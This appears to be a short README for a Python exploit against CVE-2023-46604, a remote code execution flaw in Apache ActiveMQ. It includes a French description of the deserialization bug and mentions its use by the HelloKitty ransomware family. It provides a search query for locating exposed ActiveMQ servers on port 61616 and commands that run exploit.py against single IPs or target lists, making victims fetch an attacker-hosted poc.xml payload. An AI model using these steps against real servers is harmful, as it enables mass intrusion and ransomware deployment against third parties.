
Exploit for CVE-2023-46604
Exploit pour CVE-2023-46604
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 est une vulnérabilité critique d'exécution de code à distance dans Apache ActiveMQ, un logiciel de courtage de messages open-source. Cette vulnérabilité permet à un attaquant distant ayant un accès réseau à un courtier ou client OpenWire basé sur Java d'exécuter des commandes shell arbitraires. Ceci est réalisé en manipulant les types de classes sérialisées dans le protocole OpenWire, forçant le courtier à instancier n'importe quelle classe sur le classpath. La vulnérabilité résulte d'une désérialisation non sécurisée dans Apache ActiveMQ et a été exploitée par des attaquants, notamment la famille de ransomwares HelloKitty, pour exécuter des binaires ransomware et compromettre complètement les systèmes.